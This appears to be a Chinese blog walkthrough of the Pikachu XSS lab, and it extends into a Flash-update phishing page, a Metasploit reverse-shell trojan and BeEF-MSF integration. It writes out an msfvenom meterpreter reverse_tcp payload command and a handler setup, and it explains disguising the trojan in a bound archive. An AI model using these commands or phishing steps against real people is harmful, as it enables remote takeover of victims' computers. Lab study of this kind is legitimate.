当前位置: 首页 > article >正文

pikachu-xss通关和beef联动

反射型xss-get

发现受长度限制输入不进去

修改页面输入框的最大长度为50

反射型xss-post

点一下提示登录账号

存储型xss

js代码吗

提交之后,页面跳转不可逆

DOM型xss

DOM型xss-x

xss之盲打

提交后登录后台查看xss注入到了后台登陆界面

xss之过滤

使用大小写绕过

xss之htmlspecialchars

(没有绕过)

xss之href输出

(无法绕过js标签)

(绕过)

xss之js输出

xss攻击平台

xss-窃取cookie

xss-flash攻击钓鱼

步骤一:在本机开启web服务

步骤二:部署钓鱼网站(根目录下可信度高)

进行访问

源码植入钓鱼文件

点击立即下载,完成后target到本页面

将js代码写入网站

访问js文件

用pikachu测试钓鱼网站效果

进入管理员界面输入账号密码后,网页跳转成部署的flash钓鱼网站(部署成功)

点击立即升级

点击重新下载,进入flash首页

点击立即下载,即可下载木马文件

步骤三:Kali创建木马,造成下载exe和木马同时执行效果(Kali机要保证可以Ping通)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe > shell.exe

步骤四:测试木马文件shell.exe是否可以运行

#开启监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 172.16.1.167
set lport 4444
run

进入以后,kali机shell命令进入cmd

步骤五:将木马文件放入网站根目录下(双击运行,查看kali机监听效果)

kali 乱码问题

chcp 65001

和木马文件绑定压缩

设置绑定压缩文件小图标

在网站更换病毒文件exe

pikachu模拟受害者的流程 最终获取到受害者系统控制权

kali机监听到,就可以获得外面电脑的监听权

BEEF攻击平台

BEEF安装使用

# 安装Beef
apt-get install beef-xss
beef-xss //开启

BEEF联动MSF

hook攻击机和靶机

监听靶机上线状态

设置payload

执行后,后台登录页面完成跳转

攻击机获取到靶机dll

攻击机获取到靶机主机名

攻击机获取靶机的session对话

进入靶机

获取靶机shell权限


http://www.kler.cn/a/440894.html

相关文章:

  • 等值 JOIN 的分类(JOIN 简化与提速系列 2)
  • 【网络云计算】2024第50周-每日【2024/12/13】小测-理论-写10个Bash Shell脚本-解析
  • SpringBoot配置和启动
  • Linux docker-20.10.9安装
  • 如何实现序列化和反序列化?如何处理对象的生命周期管理?
  • 马克笔习惯养成法:用色彩记录你的成就
  • JS设计模式之中介者模式
  • 数字信号处理--过采样
  • 如何评估并持续优化AI呼出机器人的使用效果
  • 【大模型量化】GPTQ量化模型
  • Cookie,Seesion和Token区别及用途
  • 概率论得学习和整理29: 用EXCEL 描述二项分布
  • 餐饮喜好及健康饮食推荐小程序
  • CVE-2024-32709 WordPress —— Recall 插件存在 SQL 注入漏洞
  • 前端发展前景探讨:技术进步与职业发展机会
  • 大数据面试题--企业面试真题
  • cephFS的使用以及K8S对接cephFS
  • 构建智能化教育平台:知识中台在教育行业的创新应用
  • 路由传值的几种方式
  • 数据结构——图论基础